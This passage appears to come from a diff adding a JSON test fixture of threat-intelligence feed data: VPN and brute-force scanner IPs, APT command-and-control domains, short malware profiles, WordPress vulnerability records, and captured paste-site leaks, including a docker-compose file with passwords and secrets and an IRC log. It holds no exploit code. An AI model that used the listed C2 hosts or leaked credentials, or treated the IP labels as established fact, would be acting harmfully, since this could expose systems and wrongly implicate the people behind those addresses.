"countryName": null, + "ip": "188.250.243.135", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657409977576, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + }, + { + "bind": null, + "dateFirstSeen": "2021-04-17T12:03:44+00:00", + "dateLastSeen": "2021-04-17T12:03:44+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "52.188.125.80", + "ipv4": { + "asn": "AS8075", + "city": null, + "countryCode": null, + "countryName": null, + "ip": "52.188.125.80", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657409978158, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + }, + { + "bind": null, + "dateFirstSeen": "2020-12-11T13:33:54+00:00", + "dateLastSeen": "2020-12-11T13:33:54+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "168.119.130.217", + "ipv4": { + "asn": "AS24940", + "city": null, + "countryCode": "DE", + "countryName": null, + "ip": "168.119.130.217", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657410005695, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + } + ], + "seqUpdate": 1671657410005695 + }, + "suspicious_ip/scanner":{ + "count": 20143973, + "items": [ + { + "bind": null, + "categories": [ + "Brute-Force" + ], + "dateFirstSeen": "2021-08-11T03:30:53+00:00", + "dateLastSeen": "2021-08-11T03:30:53+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + 
"severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "180.180.112.221", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "180.180.112.221", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + }, + { + "bind": null, + "categories": [ + "Brute-Force", + "SSH" + ], + "dateFirstSeen": "2021-08-11T03:51:19+00:00", + "dateLastSeen": "2021-08-11T08:57:51+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "159.89.54.66", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "159.89.54.66", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + }, + { + "bind": null, + "categories": [ + "Brute-Force" + ], + "dateFirstSeen": "2021-08-11T03:30:49+00:00", + "dateLastSeen": "2021-08-11T03:30:49+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "49.149.72.230", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "49.149.72.230", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + } + ], + "seqUpdate": 1628553600000000 + }, + "malware/cnc":{ + "count": 148783, + "items": [ + { + "cnc": "hint09.9966.org", + "dateDetected": "2013-05-31T20:00:00Z", + "dateFirstSeen": "2013-05-31T20:00:00Z", + "dateLastSeen": "2013-05-31T20:00:00Z", + "domain": "hint09.9966.org", + "file": null, + "id": "cb08296b420fcce499ef84edb7ac314970953a00", + "ipv4": [], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 13700304004, + "threatActor": [ + { + "id": "96054da361e4092a5a509862356f9f2541b86e9e", + "name": "NetTraveler" + } + ], + "url": "" + 
}, + { + "cnc": "82.113.19.75", + "dateDetected": "2014-08-06T20:00:00Z", + "dateFirstSeen": "2014-08-06T20:00:00Z", + "dateLastSeen": "2014-08-06T20:00:00Z", + "domain": "", + "file": null, + "id": "d67606f9fb3f81dbddbea74f3231613a742dc397", + "ipv4": [ + { + "asn": "", + "city": "", + "countryCode": "", + "countryName": "", + "ip": "82.113.19.75", + "provider": "", + "region": "" + } + ], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 14073552002, + "threatActor": [ + { + "id": "03cf30aa129ecf2eba833773e10786b1558ac212", + "name": "Turla" + } + ], + "url": "" + }, + { + "cnc": "sofexjordan2014.com", + "dateDetected": "2014-10-21T20:00:00Z", + "dateFirstSeen": "2014-10-21T20:00:00Z", + "dateLastSeen": "2014-10-21T20:00:00Z", + "domain": "sofexjordan2014.com", + "file": null, + "id": "f304865cea057e3bfce2a2f38cbbe0dabaa32728", + "ipv4": [], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 14139216000, + "threatActor": [ + { + "id": "fbde425d47a07be229130d3bd3a61b90d2b090ca", + "name": "APT28" + } + ], + "url": "" + } + ], + "seqUpdate": 14139216000 + }, + "malware/malware":{ + "count": 36, + "items": [ + { + "aliases": [], + "attachedFile": [], + "category": [ + "atm-malware" + ], + "class": null, + "deletedIocList": null, + "description": "Sorry, no description yet.", + "fileIocIdList": [], + "fileIocList": [], + "geoRegion": [ + "asia", + "asia", + "europe", + "america:northern_america", + "europe", + "asia", + "asia", + "asia", + "asia", + "asia", + "europe:european_union", + "asia", + "europe:european_union", + "asia", + "america:south_america", + "europe:european_union", + "middle_east", + "asia", + "asia", + "america:south_america", + "oceania", + "asia", + "america:northern_america", + "africa:northern_africa", + "europe:european_union", + "europe:european_union", + "middle_east", + "europe:european_union", + "europe", + "africa:southern_africa", + "europe:european_union", + "asia", + "middle_east", + 
"europe:european_union", + "america:central_america", + "europe:european_union", + "asia", + "middle_east", + "europe", + "america:south_america", + "america:south_america", + "europe:european_union", + "europe:european_union", + "europe:european_union", + "europe:european_union", + "europe:european_union", + "africa:western_africa", + "europe", + "oceania", + "america:south_america", + "europe:european_union", + "europe", + "europe", + "europe:european_union", + "europe:european_union", + "europe:european_union", + "america:south_america", + "middle_east", + "asia", + "asia", + "africa:northern_africa", + "asia", + "middle_east", + "europe:european_union", + "europe", + "europe:european_union", + "africa:northern_africa", + "america:south_america", + "america:south_america" + ], + "id": "d7fde57f6ed2051ffae9257ba6beefe0fc99192f", + "isPublished": true, + "langs": [ + "ru", + "en" + ], + "linkedMalware": [], + "malwareAliasList": [], + "mitreMatrix": [], + "name": "FASTCash", + "networkIocIdList": [], + "networkIocList": [], + "platform": [ + "atm", + "Windows", + "Linux" + ], + "portalLink": null, + "seqUpdate": 16904733083037, + "sequenceId": 16269766696153, + "shortDescription": "This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses, allowing the attackers to steal cash from ATMs.", + "signatureIdList": [], + "sourceCountry": [ + "KP", + "KR", + "RU", + "US", + "GB", + "IN", + "CN", + "VN", + "JP", + "TH", + "FR", + "HK", + "PL", + "SG", + "BR", + "DE", + "IL", + "PK", + "TW", + "AR", + "AU", + "BD", + "CA", + "EG", + "ES", + "IT", + "SA", + "SE", + "TR", + "ZA", + "BE", + "ID", + "IR", + "MT", + "MX", + "NL", + "PH", + "AE", + "CH", + "CL", + "CO", + "CZ", + "EE", + "FI", + "HU", + "IE", + "NG", + "NO", + "NZ", + "PE", + "SK", + "UA", + "AL", + "AT", + "BG", + "DK", + "EC", + "JO", + "KH", + "LK", + "MA", + "MY", + "OM", + "PT", + "RS", + "SI", + "TN", + "UY", + "VE" + ], + "taList": [ + { + "id": 
"5e9f20fdcf5876b5772b3d09b432f4080711ac5f", + "name": "Lazarus", + "url": "" + } + ], + "threatActorList": [], + "threatLevel": "High", + "updatedAt": "2024-10-22T14:58:02+03:00", + "yaraIdList": [] + }, + { + "aliases": [], + "attachedFile": [ + { + "hash": "16014bffb0788f55a7eb0ce312642cee58ec5a1153dbf1c9d38b1158abad8e02", + "mime": "image/png", + "name": "16014bffb0788f55a7eb0ce312642cee58ec5a1153dbf1c9d38b1158abad8e02", + "size": 15135 + } + ], + "category": [ + "Downloader" + ], + "class": null, + "deletedIocList": null, + "description": "Sorry, no description yet.", + "fileIocIdList": [], + "fileIocList": [], + "geoRegion": [], + "id": "8b1595ec48c0c21b16cae531bbfac1586ed2a429", + "isPublished": true, + "langs": [ + "en" + ], + "linkedMalware": [ + { + "id": "8f8b2e715cf5990f3e0eb5f6485c0d3fe67b2611", + "name": "Jcookie" + } + ], + "malwareAliasList": [], + "mitreMatrix": [], + "name": "CookieTime", + "networkIocIdList": [], + "networkIocList": [], + "platform": [ + "Windows" + ], + "portalLink": null, + "seqUpdate": 16904744513932, + "sequenceId": 16499459571753, + "shortDescription": "CookieTime is a downloader similar to Torisma, and some of the samples are protected with VMProtect packer. In order to deliver the request type to the C2 server, it uses encoded cookie values and fetches command files from the C2 server. Some of the C2 communication takes advantage of steganography techniques, delivered in files exchanged between infected clients and the C2 server. 
The contents are disguised as GIF image files, but contain encrypted commands from the C2 server and command execution results.", + "signatureIdList": [], + "sourceCountry": [], + "taList": [ + { + "id": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", + "name": "Lazarus", + "url": "" + } + ], + "threatActorList": [], + "threatLevel": "Medium", + "updatedAt": "2024-10-16T11:15:58+03:00", + "yaraIdList": [] + }, + { + "aliases": [], + "attachedFile": [ + { + "hash": "21473f69324a9cbdd6787101cd6394cec3c472a82ef49d264032db705748009d", + "mime": "image/png", + "name": "21473f69324a9cbdd6787101cd6394cec3c472a82ef49d264032db705748009d", + "size": 17618 + } + ], + "category": [ + "Remote Access Trojan", + "Rootkit", + "Trojan" + ], + "class": null, + "deletedIocList": null, + "description": "Sorry, no description yet.", + "fileIocIdList": [], + "fileIocList": [], + "geoRegion": [ + "asia" + ], + "id": "e67e9a2a7aa689a1657aa15ee0db1cf6b45c68f2", + "isPublished": true, + "langs": [ + "en" + ], + "linkedMalware": [], + "malwareAliasList": [], + "mitreMatrix": [], + "name": "Krasue", + "networkIocIdList": [], + "networkIocList": [], + "platform": [ + "Linux" + ], + "portalLink": null, + "seqUpdate": 17020334285354, + "sequenceId": 16875077457841, + "shortDescription": "Krasue is a Linux malware. It has managed to fly under the radar for a significant period. Its discovery underscores the threat it poses to critical systems and sensitive data. Capable of granting remote access to attackers, Krasue presents a significant risk. 
The malware also features a rootkit that is embedded inside the binary.", + "signatureIdList": [], + "sourceCountry": [ + "TH" + ], + "taList": [ + { + "id": "038325ee019f51440f8831e2a270603730a36504", + "name": "Unclassified_TA", + "url": "" + } + ], + "threatActorList": [], + "threatLevel": "Medium", + "updatedAt": "2024-09-30T11:15:13+03:00", + "yaraIdList": [] + } + ], + "seqUpdate": 17020334285354 + }, + "osi/vulnerability":{ + "count": 454062, + "items": [ + { + "affectedSoftware": [ + { + "name": "shrimptest", + "operator": "lt", + "version": "1.0b3" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:04+01:00", + "dateModified": "2015-05-14T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - ShrimpTest 1.0b2 - plugins/plugin-notification.php Unspecified XSS\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/7181", + "id": "WPVDB-ID:7181", + "lastseen": "2018-09-17T17:26:04+01:00", + "mergedCvss": 0, + "modified": "2015-05-14T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944090287, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + 
"title": "ShrimpTest 1.0b2 - plugins/plugin-notification.php Unspecified XSS", + "twitter": [], + "type": "wpvulndb" + }, + { + "affectedSoftware": [ + { + "name": "super-refer-a-friend", + "operator": "lt", + "version": "1.0" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:47+01:00", + "dateModified": "2018-08-28T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - super-refer-a-friend - Full Path Disclosure\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/6620", + "id": "WPVDB-ID:6620", + "lastseen": "2018-09-17T17:26:47+01:00", + "mergedCvss": 0, + "modified": "2018-08-28T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944269535, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "super-refer-a-friend - Full Path Disclosure", + "twitter": [], + "type": "wpvulndb" + }, + { + "affectedSoftware": [ + { + "name": "shrimptest", + "operator": "lt", + "version": "1.0b3" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + 
"cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:03+01:00", + "dateModified": "2015-05-14T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - ShrimpTest 1.0b2 - plugins/metric-conversion.php Multiple Unspecified XSS\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/7180", + "id": "WPVDB-ID:7180", + "lastseen": "2018-09-17T17:26:03+01:00", + "mergedCvss": 0, + "modified": "2015-05-14T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944270178, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "ShrimpTest 1.0b2 - plugins/metric-conversion.php Multiple Unspecified XSS", + "twitter": [], + "type": "wpvulndb" + } + ], + "seqUpdate": 15677944270178 + }, + "osi/public_leak":{ + "count": 24353999, + "items": [ + { + "bind": [], + "created": "2022-05-05T20:26:25+03:00", + "data": "networks:\r\n default:\r\n name: datahub_network\r\nservices:\r\n broker:\r\n container_name: broker\r\n depends_on:\r\n - zookeeper\r\n environment:\r\n - KAFKA_BROKER_ID=1\r\n - KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181\r\n - KAFKA_LISTENER_SECURITY_PROTOCOL_MAP=PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT\r\n - KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://broker:29092,PLAINTEXT_HOST://localhost:9092\r\n - 
KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR=1\r\n - KAFKA_GROUP_INITIAL_REBALANCE_DELAY_MS=0\r\n - KAFKA_HEAP_OPTS=-Xms256m -Xmx256m\r\n hostname: broker\r\n image: confluentinc/cp-kafka:5.4.0\r\n ports:\r\n - 29092:29092\r\n - 9092:9092\r\n datahub-actions:\r\n depends_on:\r\n - datahub-gms\r\n environment:\r\n - GMS_HOST=datahub-gms\r\n - GMS_PORT=8080\r\n - KAFKA_BOOTSTRAP_SERVER=broker:29092\r\n - SCHEMA_REGISTRY_URL=http://schema-registry:8081\r\n - METADATA_AUDIT_EVENT_NAME=MetadataAuditEvent_v4\r\n - METADATA_CHANGE_LOG_VERSIONED_TOPIC_NAME=MetadataChangeLog_Versioned_v1\r\n - DATAHUB_SYSTEM_CLIENT_ID=__datahub_system\r\n - DATAHUB_SYSTEM_CLIENT_SECRET=JohnSnowKnowsNothing\r\n - KAFKA_PROPERTIES_SECURITY_PROTOCOL=PLAINTEXT\r\n hostname: actions\r\n image: public.ecr.aws/datahub/acryl-datahub-actions:${ACTIONS_VERSION:-head}\r\n restart: on-failure:5\r\n datahub-frontend-react:\r\n container_name: datahub-frontend-react\r\n depends_on:\r\n - datahub-gms\r\n environment:\r\n - DATAHUB_GMS_HOST=datahub-gms\r\n - DATAHUB_GMS_PORT=8080\r\n - DATAHUB_SECRET=YouKnowNothing\r\n - DATAHUB_APP_VERSION=1.0\r\n - DATAHUB_PLAY_MEM_BUFFER_SIZE=10MB\r\n - JAVA_OPTS=-Xms512m -Xmx512m -Dhttp.port=9002 -Dconfig.file=datahub-frontend/conf/application.conf -Djava.security.auth.login.config=datahub-frontend/conf/jaas.conf -Dlogback.configurationFile=datahub-frontend/conf/logback.xml -Dlogback.debug=false -Dpidfile.path=/dev/null\r\n - KAFKA_BOOTSTRAP_SERVER=broker:29092\r\n - DATAHUB_TRACKING_TOPIC=DataHubUsageEvent_v1\r\n - ELASTIC_CLIENT_HOST=elasticsearch\r\n - ELASTIC_CLIENT_PORT=9200\r\n - AUTH_OIDC_ENABLED=true\r\n - AUTH_OIDC_CLIENT_ID=${DATAHUB_IAM_ID}\r\n - AUTH_OIDC_CLIENT_SECRET=${DATAHUB_IAM_SECRET}\r\n - AUTH_OIDC_DISCOVERY_URI=${DATAHUB_IAM_URI}\r\n - AUTH_OIDC_BASE_URL=${DATAHUB_URL}\r\n #- AUTH_OIDC_SCOPE=\"\"\r\n - METADATA_SERVICE_AUTH_ENABLED=true\r\n hostname: datahub-frontend-react\r\n image: linkedin/datahub-frontend-react:${DATAHUB_VERSION:-head}\r\n ports:\r\n 
- 9002:9002\r\n volumes:\r\n - ${HOME}/.datahub/plugins:/etc/datahub/plugins\r\n - ${HOME}/.datahub/plugins/frontend/auth/user.props:/datahub-frontend/conf/user.props\r\n datahub-gms:\r\n container_name: datahub-gms\r\n depends_on:\r\n - mysql\r\n environment:\r\n - DATASET_ENABLE_SCSI=false\r\n - EBEAN_DATASOURCE_USERNAME=datahub\r\n - EBEAN_DATASOURCE_PASSWORD=datahub\r\n - EBEAN_DATASOURCE_HOST=mysql:3306\r\n - EBEAN_DATASOURCE_URL=jdbc:mysql://mysql:3306/datahub?verifyServerCertificate=false&useSSL=true&useUnicode=yes&characterEncoding=UTF-8\r\n - EBEAN_DATASOURCE_DRIVER=com.mysql.jdbc.Driver\r\n - KAFKA_BOOTSTRAP_SERVER=broker:29092\r\n - KAFKA_SCHEMAREGISTRY_URL=http://schema-registry:8081\r\n - ELASTICSEARCH_HOST=elasticsearch\r\n - ELASTICSEARCH_PORT=9200\r\n - GRAPH_SERVICE_IMPL=elasticsearch\r\n - JAVA_OPTS=-Xms1g -Xmx1g\r\n - ENTITY_REGISTRY_CONFIG_PATH=/datahub/datahub-gms/resources/entity-registry.yml\r\n - MAE_CONSUMER_ENABLED=true\r\n - MCE_CONSUMER_ENABLED=true\r\n - UI_INGESTION_ENABLED=true\r\n - UI_INGESTION_DEFAULT_CLI_VERSION=0.8.26.6\r\n - METADATA_SERVICE_AUTH_ENABLED=true\r\n hostname: datahub-gms\r\n image: linkedin/datahub-gms:${DATAHUB_VERSION:-head}\r\n ports:\r\n - 8080:8080\r\n volumes:\r\n - ${HOME}/.datahub/plugins:/etc/datahub/plugins\r\n elasticsearch:\r\n container_name: elasticsearch\r\n environment:\r\n - discovery.type=single-node\r\n - xpack.security.enabled=false\r\n - ES_JAVA_OPTS=-Xms256m -Xmx256m -Dlog4j2.formatMsgNoLookups=true\r\n healthcheck:\r\n retries: 4\r\n start_period: 2m\r\n test:\r\n - CMD-SHELL\r\n - curl -sS --fail 'http://localhost:9200/_cluster/health?wait_for_status=yellow&timeout=0s' || exit 1\r\n hostname: elasticsearch\r\n image: elasticsearch:7.9.3\r\n mem_limit: 1g\r\n ports:\r\n - 9200:9200\r\n volumes:\r\n - esdata:/usr/share/elasticsearch/data\r\n elasticsearch-setup:\r\n container_name: elasticsearch-setup\r\n depends_on:\r\n - elasticsearch\r\n environment:\r\n - 
ELASTICSEARCH_HOST=elasticsearch\r\n - ELASTICSEARCH_PORT=9200\r\n - ELASTICSEARCH_PROTOCOL=http\r\n hostname: elasticsearch-setup\r\n image: linkedin/datahub-elasticsearch-setup:${DATAHUB_VERSION:-head}\r\n kafka-setup:\r\n container_name: kafka-setup\r\n depends_on:\r\n - broker\r\n - schema-registry\r\n environment:\r\n - KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181\r\n - KAFKA_BOOTSTRAP_SERVER=broker:29092\r\n hostname: kafka-setup\r\n image: linkedin/datahub-kafka-setup:${DATAHUB_VERSION:-head}\r\n mysql:\r\n command: --character-set-server=utf8mb4 --collation-server=utf8mb4_bin\r\n container_name: mysql\r\n environment:\r\n - MYSQL_DATABASE=datahub\r\n - MYSQL_USER=datahub\r\n - MYSQL_PASSWORD=datahub\r\n - MYSQL_ROOT_PASSWORD=datahub\r\n hostname: mysql\r\n image: mysql:5.7\r\n ports:\r\n - 3306:3306\r\n volumes:\r\n - ../mysql/init.sql:/docker-entrypoint-initdb.d/init.sql\r\n - mysqldata:/var/lib/mysql\r\n mysql-setup:\r\n container_name: mysql-setup\r\n depends_on:\r\n - mysql\r\n environment:\r\n - MYSQL_HOST=mysql\r\n - MYSQL_PORT=3306\r\n - MYSQL_USERNAME=datahub\r\n - MYSQL_PASSWORD=datahub\r\n - DATAHUB_DB_NAME=datahub\r\n hostname: mysql-setup\r\n image: acryldata/datahub-mysql-setup:head\r\n schema-registry:\r\n container_name: schema-registry\r\n depends_on:\r\n - zookeeper\r\n - broker\r\n environment:\r\n - SCHEMA_REGISTRY_HOST_NAME=schemaregistry\r\n - SCHEMA_REGISTRY_KAFKASTORE_CONNECTION_URL=zookeeper:2181\r\n hostname: schema-registry\r\n image: confluentinc/cp-schema-registry:5.4.0\r\n ports:\r\n - 8081:8081\r\n zookeeper:\r\n container_name: zookeeper\r\n environment:\r\n - ZOOKEEPER_CLIENT_PORT=2181\r\n - ZOOKEEPER_TICK_TIME=2000\r\n hostname: zookeeper\r\n image: confluentinc/cp-zookeeper:5.4.0\r\n ports:\r\n - 2181:2181\r\n volumes:\r\n - zkdata:/var/opt/zookeeper\r\nversion: '2.3'\r\nvolumes:\r\n esdata: null\r\n mysqldata: null\r\n zkdata: null\r\n", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + 
"admiralty_code": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "hash": "0083e0516cac929a5f5267f8f5ebebb77063f235", + "id": "0083e0516cac929a5f5267f8f5ebebb77063f235", + "language": "xml", + "linkList": [ + { + "author": "", + "hash": "024c788fdacdd8b8827de9e50c13ea0e6dde1988", + "link": "https://pastebin.com/HPjD9kmj", + "title": "", + "source": "pastebin.com", + "dateDetected": "2022-05-05T20:26:25+03:00", + "datePublished": "2022-05-05T17:16:43+00:00", + "itemSource": "api", + "size": 6625, + "status": 1, + "sequenceUpdate": 1651771585142655 + } + ], + "matches": { + "commonKeywords": { + "password": [ + "PASSWORD" + ] + } + }, + "seqUpdate": -1651773180003874, + "updated": "2022-05-05T20:26:25+03:00" + }, + { + "bind": [], + "created": "2017-09-17T17:06:08+03:00", + "data": "* kicken (~Keith@c-98-238-66-220.hsd1.fl.comcast.net) has joined #php\r\n oh? which one?\r\n hmm\r\n let me finish up the write-up\r\n then I'll let you know\r\n but google shows me ~50k people who are vulnerable, and it's full db disclosure\r\n well, enough db disclosure :)\r\n fun fun\r\n gimme the url to your write-up when you get it finished\r\n im not the publisher, am i?\r\n lol\r\n s/publisher/plugin author/\r\n no ansi\r\n* OscarWeb (~hola@186.59.129.134) has joined #php\r\n* OscarWeb has quit (Quit: zzzzZZzzzzZzzZzZz)\r\n ansi, I think I'm going to do the right thing and notify the vendor\r\n where's the fun in that\r\n build a botnet\r\n does wordpress use bcrypt or something now?\r\n responsible poutine is boring", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiralty_code": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "hash": "c2224f5f81bb375ba7c2871f605b1c6825ef1092", + "id": "c2224f5f81bb375ba7c2871f605b1c6825ef1092", + "language": "text", + "linkList": [ + { + "author": "guest", + "hash": 
"f2a78d1716758091c7df9629d6a5ac81cfa4ee0e", + "link": "https://pastebin.com/7MK8SZww", + "title": "Untitled", + "source": "pastebin.com", + "dateDetected": "2017-09-17T17:06:08+03:00", + "datePublished": "2017-09-17T09:06:06+03:00", + "itemSource": "", + "size": 821, + "status": 1, + "sequenceUpdate": 1505657168596901 + } + ], + "matches": { + "email": { + "email": [ + "Keith@c-98-238-66-220.hsd1.fl.comcast.net", + "hola@186.59.129.134" + ] + } + }, + "seqUpdate": 16202106434186, + "updated": "2017-09-17T17:06:08+03:00" + } + ], + "seqUpdate": 16202106434186 + }, + "osi/git_repository":{ + "count": 4, + "items": [ + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "password": 1 + }, + "dateCreated": "2023-07-29T19:15:41+03:00", + "dateDetected": "2024-10-05T22:34:14+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-07-29T19:15:41+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "53e081b81ede4de32383bfc7a274877cad14cca0", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "8b6cd23d023fbc3f2117b5cb9cb1de5ee936e639", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647341 + } + } + ], + "rules": null, + "url": "https://github.com/example/DALILightEngine/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + 
"credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ff4809c63e236267da1987e2f85b6e3b67492cbf", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/AscCommonCommands/AscCommonCommands.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/AscCommonCommands/AscCommonCommands.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1107c7dc3a868e7d2e28c3d45aedcee685991b8b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/AscCommonCommands/AscCommonCommands.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/AscCommonCommands/AscCommonCommands.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + 